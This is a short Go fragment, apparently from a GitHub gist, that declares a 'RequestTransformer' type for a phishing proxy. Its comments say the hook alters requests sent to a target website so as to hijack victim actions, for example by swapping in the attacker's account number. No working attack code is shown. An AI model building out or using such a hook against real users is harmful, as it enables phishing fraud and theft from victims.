This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// RequestTransformer modifies a request before it is sent to the target website. | |
// This can be used to hijack victim actions, like replacing an account number with ours. | |
// Delays in this function will slow down the phishing site for the victim. | |
// Your RequestTransformer should be a function called "RequestTransformer" | |
type RequestTransformer func(*http.Request) error |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment